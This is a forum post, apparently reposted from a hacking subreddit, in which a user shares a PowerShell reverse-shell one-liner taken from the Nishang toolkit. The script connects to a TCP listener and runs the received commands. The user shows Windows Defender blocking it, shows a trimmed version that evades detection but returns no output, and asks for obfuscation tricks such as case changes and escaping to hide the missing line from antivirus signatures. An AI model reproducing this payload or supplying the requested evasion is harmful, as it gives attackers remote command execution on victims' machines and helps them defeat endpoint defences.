I'll use the following script as an example
https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcpOneLine.ps1
PS C:\Users\wolf\Documents> $sm=(New-Object Net.Sockets.TCPClient('127.0.0.1',1337)).GetStream();[byte[]]$bt=0..65535|%{0};while(($i=$sm.Read($bt,0,$bt.Length)) -ne 0){;$d=(New-Object Text.ASCIIEncoding).GetString($bt,0,$i);$st=([text.encoding]::ASCII).GetBytes((iex $d 2>&1));$sm.Write($st,0,$st.Length)} At line:1 char:1 + $sm=(New-Object Net.Sockets.TCPClient('127.0.0.1',1337)).GetStream( ... + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This script contains malicious content and has been blocked by your antivirus software. + CategoryInfo : ParserError: (:) [], ParseException + FullyQualifiedErrorId : ScriptContainedMaliciousContent PS C:\Users\wolf\Documents> If I use the whole script, Defender is detecting and blocking it. However, when I remove the last line, it's not being detected
Remove last part
$sm.Write($st,0,$st.Length) Final script
$sm=(New-Object Net.Sockets.TCPClient('127.0.0.1',1337)).GetStream();[byte[]]$bt=0..65535|%{0};while(($i=$sm.Read($bt,0,$bt.Length)) -ne 0){;$d=(New-Object Text.ASCIIEncoding).GetString($bt,0,$i);$st=([text.encoding]::ASCII).GetBytes((iex $d 2>&1));} My nc listener received the connection, but there is no output from any of my commands
I guess the last part which I removed is important to write the output to the console and defender has it in their signature
How evasion technique can be applied for the last part? I've seen somewhere they just change the character, e.g. from small to upper case and other escaping techniques as well.
I was trying to search for that but not sure what is the right keyword should be used. Hopefully someone from here can help me to identify it. Thank you
[link] [comments]
from hacking: security in practice https://ift.tt/8ZKvepq
Comments
Post a Comment